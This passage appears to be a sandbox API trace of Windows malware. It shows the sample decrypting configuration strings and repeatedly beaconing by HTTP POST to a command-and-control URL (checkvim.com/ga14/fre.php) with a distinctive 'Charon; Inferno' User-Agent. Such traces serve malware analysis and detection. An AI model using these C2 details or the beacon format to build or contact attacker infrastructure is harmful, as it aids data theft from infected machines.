0x87f7a0 [0295.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.424] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0295.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.429] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0295.434] GetProcessHeap () returned 0x840000 [0295.434] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0295.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.434] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0295.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.435] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0295.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.436] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.436] GetProcessHeap () returned 0x840000 [0295.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0295.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.437] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0295.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.437] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0295.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.438] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0295.438] GetProcessHeap () returned 0x840000 [0295.438] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0295.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.439] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0295.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.440] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0295.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.440] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0295.440] GetProcessHeap () returned 0x840000 [0295.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0295.441] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0295.459] GetProcessHeap () returned 0x840000 [0295.459] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0295.459] socket (af=2, type=1, protocol=6) returned 0x4b4 [0295.459] connect (s=0x4b4, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0295.532] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0295.533] GetProcessHeap () returned 0x840000 [0295.533] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0295.533] GetProcessHeap () returned 0x840000 [0295.533] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0295.534] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0295.536] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0295.536] GetProcessHeap () returned 0x840000 [0295.536] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0295.536] GetProcessHeap () returned 0x840000 [0295.536] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0295.536] GetProcessHeap () returned 0x840000 [0295.536] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fbd8 [0295.536] GetProcessHeap () returned 0x840000 [0295.537] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0295.538] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0295.540] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0295.540] GetProcessHeap () returned 0x840000 [0295.540] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0295.540] GetProcessHeap () returned 0x840000 [0295.540] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0295.540] send (s=0x4b4, buf=0x873a58*, len=237, flags=0) returned 237 [0295.540] send (s=0x4b4, buf=0x87eb58*, len=159, flags=0) returned 159 [0295.540] GetProcessHeap () returned 0x840000 [0295.540] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0295.540] recv (in: s=0x4b4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0295.904] closesocket (s=0x4b4) returned 0 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0295.904] GetProcessHeap () returned 0x840000 [0295.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0295.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x12e8) returned 0x4b4 [0295.906] Sleep (dwMilliseconds=0xea60) [0295.910] GetProcessHeap () returned 0x840000 [0295.910] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0295.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.911] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0295.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.935] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0295.943] GetProcessHeap () returned 0x840000 [0295.943] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0295.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.944] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0295.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.945] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0295.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.946] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.946] GetProcessHeap () returned 0x840000 [0295.946] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0295.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.947] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0295.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.949] CryptDestroyKey (hKey=0x87e430) returned 1 [0295.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.950] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0295.950] GetProcessHeap () returned 0x840000 [0295.950] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0295.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.951] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.952] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.953] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.954] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.954] GetProcessHeap () returned 0x840000 [0295.955] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0295.955] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0295.955] GetProcessHeap () returned 0x840000 [0295.955] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0295.955] GetProcessHeap () returned 0x840000 [0295.955] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0295.955] GetProcessHeap () returned 0x840000 [0295.955] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0295.955] GetProcessHeap () returned 0x840000 [0295.955] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0295.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.956] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0295.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.961] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0295.997] GetProcessHeap () returned 0x840000 [0295.997] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0295.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.998] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0295.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0295.999] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0296.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.000] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.000] GetProcessHeap () returned 0x840000 [0296.000] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0296.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.001] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0296.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.002] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0296.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.003] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0296.003] GetProcessHeap () returned 0x840000 [0296.003] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0296.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.004] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0296.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.005] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0296.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.006] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0296.006] GetProcessHeap () returned 0x840000 [0296.006] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0296.006] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0296.008] GetProcessHeap () returned 0x840000 [0296.008] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0296.008] socket (af=2, type=1, protocol=6) returned 0x4b8 [0296.008] connect (s=0x4b8, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0296.079] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0296.079] GetProcessHeap () returned 0x840000 [0296.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0296.079] GetProcessHeap () returned 0x840000 [0296.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0296.080] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0296.081] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0296.081] GetProcessHeap () returned 0x840000 [0296.081] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0296.081] GetProcessHeap () returned 0x840000 [0296.082] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0296.082] GetProcessHeap () returned 0x840000 [0296.082] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa70 [0296.082] GetProcessHeap () returned 0x840000 [0296.082] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0296.083] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0296.084] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0296.084] GetProcessHeap () returned 0x840000 [0296.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0296.084] GetProcessHeap () returned 0x840000 [0296.084] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0296.084] send (s=0x4b8, buf=0x873a58*, len=237, flags=0) returned 237 [0296.085] send (s=0x4b8, buf=0x87eb58*, len=159, flags=0) returned 159 [0296.085] GetProcessHeap () returned 0x840000 [0296.085] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0296.085] recv (in: s=0x4b8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0296.458] GetProcessHeap () returned 0x840000 [0296.458] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0296.458] GetProcessHeap () returned 0x840000 [0296.458] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0296.458] GetProcessHeap () returned 0x840000 [0296.458] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0296.458] GetProcessHeap () returned 0x840000 [0296.458] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0296.458] closesocket (s=0x4b8) returned 0 [0296.458] GetProcessHeap () returned 0x840000 [0296.459] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0296.459] GetProcessHeap () returned 0x840000 [0296.459] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0296.459] GetProcessHeap () returned 0x840000 [0296.459] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0296.459] GetProcessHeap () returned 0x840000 [0296.459] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0296.459] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x10c8) returned 0x4b8 [0296.460] Sleep (dwMilliseconds=0xea60) [0296.465] GetProcessHeap () returned 0x840000 [0296.465] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0296.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.466] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0296.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.476] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0296.481] GetProcessHeap () returned 0x840000 [0296.481] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0296.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.482] CryptImportKey (in: hProv=0x86f710, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0296.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.483] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0296.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.484] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.484] GetProcessHeap () returned 0x840000 [0296.484] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0296.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.485] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0296.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.486] CryptDestroyKey (hKey=0x87e930) returned 1 [0296.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.487] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0296.487] GetProcessHeap () returned 0x840000 [0296.487] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0296.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.488] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.489] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.490] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.491] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.491] GetProcessHeap () returned 0x840000 [0296.491] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0296.491] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0296.491] GetProcessHeap () returned 0x840000 [0296.491] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0296.491] GetProcessHeap () returned 0x840000 [0296.492] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0296.492] GetProcessHeap () returned 0x840000 [0296.492] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0296.492] GetProcessHeap () returned 0x840000 [0296.492] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0296.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.493] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0296.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.498] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0296.504] GetProcessHeap () returned 0x840000 [0296.505] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0296.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.506] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0296.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.507] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0296.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.508] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.508] GetProcessHeap () returned 0x840000 [0296.508] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0296.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0296.509] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0296.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 